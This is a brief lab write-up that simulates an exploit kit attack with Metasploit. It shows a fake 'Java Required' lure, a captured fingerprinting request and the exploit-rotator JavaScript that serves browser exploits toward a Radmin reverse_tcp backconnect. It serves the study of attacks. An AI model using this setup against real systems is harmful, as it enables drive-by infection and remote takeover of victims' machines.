Exploit Kit Experience

Learning Outcome:

• Simulate an exploit kit (EK) attack by hosting a plethora of relevant browser exploits (with the malicious iframe injection) on the fake "Java Required" page with the endgoal of downloading and running Radmin, a remote administration tool with the reverse_tcp shellcode backconnect, on the victim host.

Setup:

• Setup a local HTTP server with the exploitable vulnerabilities available through MetaSploit Framework

Outcome:

• I. Windows 7 Chrominum Browser -> served with 6 exploits
• II. Windows 7 Firefox/5.0 46.0 Browser > served with 10 exploits​

Here is an interesting traffic call:
-> 192.168.0.192:8080
GET /?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDplbi1VUzp4ODY6RmlyZWZveDozNS4wOg== HTTP/1.1
Host: 192.168.0.192:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.192:8080/
Connection: keep-alive

[sessid=base64encoded(Windows 7:undefined:undefined:undefined:undefined:en-US:x86:Firefox:35.0:)[

All in all, we are served with the two PHP files:

1 - Exploit rotator;  and
2 - Exploit enumerator

Here is the rotator script captured by Fiddler Web Developer on the data request:

global_exploit_list[global_exploit_list.length] = {
'test':'if (!ua_ver_lt(detected_version[\'ua_version\'], \'15.0\') && !ua_ver_gt(detected_version[\'ua_version\'], \'22.0\')) { is_vuln = true;} else { is_vuln = false; }',
'resource':'/UmOgoQAuaH'};
global_exploit_list[global_exploit_list.length] = {
'test':'if (!ua_ver_lt(detected_version[\'ua_version\'], \'22.0\') && !ua_ver_gt(detected_version[\'ua_version\'], \'27.0\')) { is_vuln = true;} else { is_vuln = false; }',  'resource':'/AcOkePbJp'};

global_exploit_list[global_exploit_list.length] = {
'test':'is_vuln = navigator.javaEnabled()',
  'resource':'/LcfQAkA'};

global_exploit_list[global_exploit_list.length] = {
 'test':'is_vuln = navigator.javaEnabled()',
'resource':'/usBkaxsZ'};
global_exploit_list[global_exploit_list.length] = {
'test':'is_vuln = navigator.javaEnabled()',
'resource':'/qMVrLY'};
global_exploit_list[global_exploit_list.length] = {
 'test':'is_vuln = navigator.javaEnabled()',
 'resource':'/XhgZgfkin'};
global_exploit_list[global_exploit_list.length] = {
'test':'is_vuln = navigator.javaEnabled()',
'resource':'/pUHbtcUl'};
global_exploit_list[global_exploit_list.length] = {
'test':'is_vuln = navigator.javaEnabled()',
'resource':'/KCHgwKCyyIb'};
global_exploit_list[global_exploit_list.length] = {
'test':'if (!ua_ver_lt(detected_version[\'ua_version\'], \'5.0\') && !ua_ver_gt(detected_version[\'ua_version\'], \'15.0.1\')) { is_vuln = true;} else { is_vuln = false; }',
'resource':'/FBapzEXZJVcM'};

global_exploit_list[global_exploit_list.length] = {
'test':'if (!ua_ver_lt(detected_version[\'ua_version\'], \'3.5\') && !ua_ver_gt(detected_version[\'ua_version\'], \'3.6.16\')) { if (navigator.userAgent.indexOf(\'Windows NT 5.1\') != -1 || navigator.javaEnabled()) { is_vuln = true; }} else { is_vuln = false; }','resource':'/YLDbvbb'};

window.next_exploit(0);